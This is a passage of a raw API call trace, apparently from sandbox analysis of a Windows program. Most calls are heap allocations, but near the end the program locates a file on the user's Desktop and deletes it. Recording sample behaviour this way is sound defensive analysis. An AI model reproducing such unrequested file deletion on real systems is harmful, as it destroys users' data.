hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0189.351] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0189.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0189.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0189.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0189.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0189.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0189.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.353] CloseHandle (hObject=0x268) returned 1 [0189.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.376] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0189.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0189.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0189.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0189.377] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0189.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0189.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0189.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0189.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0189.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0189.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0189.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0189.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0189.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0189.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0189.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0189.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0189.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0189.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0189.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0189.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0189.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0189.383] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0189.384] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0189.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.385] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0189.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0189.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0189.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0189.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0189.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0189.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0189.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0189.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0189.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0189.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0189.386] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/srS5tTxQY.mp3", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srS5tTxQY.mp3", lpFilePart=0x8bedfc*="srS5tTxQY.mp3") returned 0x33 [0189.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0189.386] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srS5tTxQY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\srs5ttxqy.mp3")) returned 0x20 [0189.386] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srS5tTxQY.mp3", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6bb1b0, ftCreationTime.dwHighDateTime=0x1d4d0c8, ftLastAccessTime.dwLowDateTime=0xc696cb50, ftLastAccessTime.dwHighDateTime=0x1d4cc9d, ftLastWriteTime.dwLowDateTime=0xc696cb50, ftLastWriteTime.dwHighDateTime=0x1d4cc9d, nFileSizeHigh=0x0, nFileSizeLow=0x9f34, dwReserved0=0x7d, dwReserved1=0x4, cFileName="srS5tTxQY.mp3", cAlternateFileName="SRS5TT~1.MP3")) returned 0xaa58e0 [0189.386] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srS5tTxQY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\srs5ttxqy.mp3")) returned 1 [0189.388] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6bb1b0, ftCreationTime.dwHighDateTime=0x1d4d0c8, ftLastAccessTime.dwLowDateTime=0xc696cb50, ftLastAccessTime.dwHighDateTime=0x1d4cc9d, ftLastWriteTime.dwLowDateTime=0xc696cb50, ftLastWriteTime.dwHighDateTime=0x1d4cc9d, nFileSizeHigh=0x0, nFileSizeLow=0x9f34, dwReserved0=0x7d, dwReserved1=0x4, cFileName="srS5tTxQY.mp3", cAlternateFileName="SRS5TT~1.MP3")) returned 0 [0189.388] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0189.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0189.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0189.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0189.388] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0189.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0189.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0189.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0189.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0189.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0189.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0189.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0189.389] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0189.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0189.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0189.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0189.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0189.389] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0189.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0189.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0189.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0189.389] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/srS5tTxQY.mp3", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srS5tTxQY.mp3", lpFilePart=0x8bf658*="srS5tTxQY.mp3") returned 0x33 [0189.389] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, 